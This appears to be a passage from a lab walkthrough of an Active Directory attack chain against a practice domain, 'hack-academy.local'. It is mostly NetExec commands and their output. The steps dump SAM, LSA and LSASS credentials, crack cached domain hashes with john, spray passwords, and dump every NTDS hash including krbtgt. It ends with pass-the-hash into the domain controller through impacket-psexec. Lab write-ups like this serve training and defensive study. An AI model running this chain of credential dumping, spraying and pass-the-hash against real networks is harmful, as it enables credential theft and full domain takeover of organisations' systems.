$─$ nxc smb 10.0.2.7 -u twest -p 'HappyCactus$10' --sam
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)
$SMB 10.0.2.7 445 CLIENT-1 [*] Dumping SAM hashes
$SMB 10.0.2.7 445 CLIENT-1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.7 445 CLIENT-1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.7 445 CLIENT-1 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.7 445 CLIENT-1 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:156e3de3d13ba510e8c2b62f4f5d0216:::
$SMB 10.0.2.7 445 CLIENT-1 Matt:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
$SMB 10.0.2.7 445 CLIENT-1 [+] Added 5 SAM hashes to the database
$
$┌──(kali㉿kali)-[~/AD-chain1]
$└─$ nxc smb ips -u twest -p 'HappyCactus$10' -M lsassy
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10
$LSASSY 10.0.2.7 445 CLIENT-1 CLIENT-1\Matt 7facdc498ed1680c4fd1448319a8c04f
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
$
$
$┌──(kali㉿kali)-[~/AD-chain1]
$└─$ nxc smb ips -u twest -p 'HappyCactus$10' --lsa
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.7 445 CLIENT-1 [+] Dumping LSA secrets
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY.LOCAL/eknight:$DCC2$10240#eknight#e92981e7e9fc7e5732c32865e4c83a8a: (2025-11-29 10:54:13)
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aes256-cts-hmac-sha1-96:570f9a1929f82a89c0f21559f3a325024f37788a9e8b37e810f813c21c25cc21
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aes128-cts-hmac-sha1-96:a24d41483115b4bafe8d0a2d963187af
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:des-cbc-md5:10bf0bb3b3e6e334
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:plain_password_hex:80f911ccc586e88cc6e6a20bedc9c6c4febb59ebca2658e32aa6a03bf8803353c91252f137f6a86c1024da9b8ffaded196aa5a6234f49dc294228a15845ac2ae3a56c4b09209a1936e9d4c2495381fc6a412a5829006e1981eb27f35978d522bd8a7c104b7e98bc58fe63287c8e59da0b9a5cbf66caa76cae366b098b0f899593e69ba0748bf601b7162250424469d07d2f398d92b8677c0930211319d0e34fe95c51d61808273b3f5431162a696324e4d7cd40f85fdf09352ebfff13075aa591c9104772eeb99daec23af7662cde734447a30fb87fd0d6daec32a542b1a48ee4e98f90e40d233fa235c4d691bc10c9a
$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aad3b435b51404eeaad3b435b51404ee:67c5a6954b7926c79715433f180524b3:::
$SMB 10.0.2.7 445 CLIENT-1 dpapi_machinekey:0xf40fb1b5e9b0e32e3f894a8ea41407ea759f7d72
$dpapi_userkey:0xb4817a980cb0d48b9cd1300c3ed32fb0d6f0bdc7
$SMB 10.0.2.7 445 CLIENT-1 [+] Dumped 7 LSA secrets to /home/kali/.nxc/logs/lsa/CLIENT-1_10.0.2.7_2026-02-12_010037.secrets and /home/kali/.nxc/logs/lsa/CLIENT-1_10.0.2.7_2026-02-12_010037.cached
$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
$

You will get ms2hash and then you crack it with john and you get another set of credentials! eknight : !!Stud87

🐺 howlsec@kali
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes_lsa_client1

(screenshot omitted) Now since you have a Domain User credentials, you have to spray again!

🐺 howlsec@kali
$nxc smb ips -u users -p passwords --continue-on-success
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123
$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\eknight:!!Stud87

Winrm shows access on Client 2 as well

🐺 howlsec@kali
$nxc winrm ips -u users -p passwords --continue-on-success
$WINRM 10.0.2.9 5985 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)

Now you can Dump remotely hashes again with eknight : !!Stud87

🐺 howlsec@kali
$─$ nxc smb 10.0.2.9 -u eknight -p '!!Stud87' --sam
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)
$SMB 10.0.2.9 445 CLIENT-2 [*] Dumping SAM hashes
$SMB 10.0.2.9 445 CLIENT-2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cb02bc3b3782d63acca9a324d035d768:::
$SMB 10.0.2.9 445 CLIENT-2 David:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
$SMB 10.0.2.9 445 CLIENT-2 [+] Added 5 SAM hashes to the database
$
$nxc smb 10.0.2.9 -u eknight -p '!!Stud87' --lsa
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)
$SMB 10.0.2.9 445 CLIENT-2 [+] Dumping LSA secrets
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/mthompson:$DCC2$10240#mthompson#364a73de9ce144051ec14a2fdeb6a757: (2025-11-29 22:53:13)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/eknight:$DCC2$10240#eknight#e92981e7e9fc7e5732c32865e4c83a8a: (2025-11-29 21:52:57)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes256-cts-hmac-sha1-96:266a56b6af2b65084cda9f39ecb3b7d7780220638053fa05ceeceffe12d130b0
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes128-cts-hmac-sha1-96:9ef693e72c3751712e6f4930908c338c
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:des-cbc-md5:d9c25d799d570dab
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:plain_password_hex:d4bbe9a1395462e580c52f08ac8a63da72d5bf61383cd9e7406982a5b7fe20212ae059841b3415faa6b10db7a0d61845961831ec08e4730abdde6ada65f203558f1dc4a13fa8a60774a419da1def524e210c0833ff2406f3aedb0ba4830d189003ed5673fb93cb302e3d7c24448689636cb6d6edb086dc1f9cec055d1bf23b4060efc0b6a5093c58903f9543aa3eb438b32d6e247faa323d35145117ee9d04c935e294b43ac4cb2696d5d77d51f3ebfc3df8881d20d890de9f3540408dbc7f7cc37dfb0930de7a4ce7ce06222b55d054448a52f54543f05e07bb57ad29dfa6bbdfff5cccfd91b423af633b19b124e49a
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aad3b435b51404eeaad3b435b51404ee:d8d142d54cda4b8f6015faccae95d25b:::
$SMB 10.0.2.9 445 CLIENT-2 dpapi_machinekey:0x0567c35e4dc0d3fb5d2015ba0341053b907b64f1
$dpapi_userkey:0x18dba29d7d5e9a483e3844e96fcd2d5130b52886
$SMB 10.0.2.9 445 CLIENT-2 [+] Dumped 8 LSA secrets to /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-12_010226.secrets and /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-12_010226.cached

And now you have found Hash for mthompson and if you look at the BH data he is a member of Domain Admins! (screenshot omitted) Now we can crack his hash with john

🐺 howlsec@kali
$john --wordlist=/usr/share/wordlists/rockyou.txt hashes_lsa_client2

Once you are domain admin you can dump all the hashes of all the users

🐺 howlsec@kali
$nxc smb 10.0.2.4 -u mthompson -p 'Password123!!' --ntds
$[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\mthompson:Password123!! (Pwn3d!)
$SMB 10.0.2.4 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
$SMB 10.0.2.4 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0ced2de918b4a7c1b9f4efd225dd503:::
$SMB 10.0.2.4 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.4 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3814b17f76015a3112d545f4899eabd:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\mjohnson:1125:aad3b435b51404eeaad3b435b51404ee:ac2ccc026dea7c08845a58245f9d1a20:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\lbennett:1126:aad3b435b51404eeaad3b435b51404ee:08b1de7a0f8e635ffd4416b2aac575bb:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\egreen:1127:aad3b435b51404eeaad3b435b51404ee:6cef82c3f7326a708020d3488777e8b8:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\spatel:1128:aad3b435b51404eeaad3b435b51404ee:40dca294807d71c40cf79ca8f80630e4:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\dreyes:1129:aad3b435b51404eeaad3b435b51404ee:d66d916172d22964ca1dcbc262009ecd:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\nflores:1130:aad3b435b51404eeaad3b435b51404ee:851923db851118b1cf6e3b43486b6f3b:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\clee:1131:aad3b435b51404eeaad3b435b51404ee:695e750f127db5a5e5c9286dc3f780e4:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\otran:1132:aad3b435b51404eeaad3b435b51404ee:ebc5b3ec914252428ded45305314b59a:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\zmiller:1133:aad3b435b51404eeaad3b435b51404ee:b6b667f08033fd13ad9dd14bfe84bceb:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\mross:1134:aad3b435b51404eeaad3b435b51404ee:3b65cedb4c262e14a08c100b005b43ec:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\twest:1135:aad3b435b51404eeaad3b435b51404ee:906023fe7b7aa4f1367ba13298a3e9c7:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\eknight:1136:aad3b435b51404eeaad3b435b51404ee:61b76eb924a8231b268cd31ebd1730a1:::
$SMB 10.0.2.4 445 DC01 hack-academy.local\mthompson:1141:aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::
$SMB 10.0.2.4 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ec287185ca620060c918cbaa4d48267d:::
$SMB 10.0.2.4 445 DC01 CLIENT-1$:1103:aad3b435b51404eeaad3b435b51404ee:67c5a6954b7926c79715433f180524b3:::
$SMB 10.0.2.4 445 DC01 CLIENT-2$:1104:aad3b435b51404eeaad3b435b51404ee:d8d142d54cda4b8f6015faccae95d25b:::
$SMB 10.0.2.4 445 DC01 [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds of which 16 were added to the database
$SMB 10.0.2.4 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
$SMB 10.0.2.4 445 DC01 [*] cat /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds | grep -iv disabled | cut -d ':' -f1
$SMB 10.0.2.4 445 DC01 [*] grep -iv disabled /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds | cut -d ':' -f1

If you want direct shell you can use impacket-psexec

🐺 howlsec@kali
$impacket-psexec hack-academy.local/Administrator@10.0.2.4 -hashes :c0ced2de918b4a7c1b9f4efd225dd503

(screenshot omitted)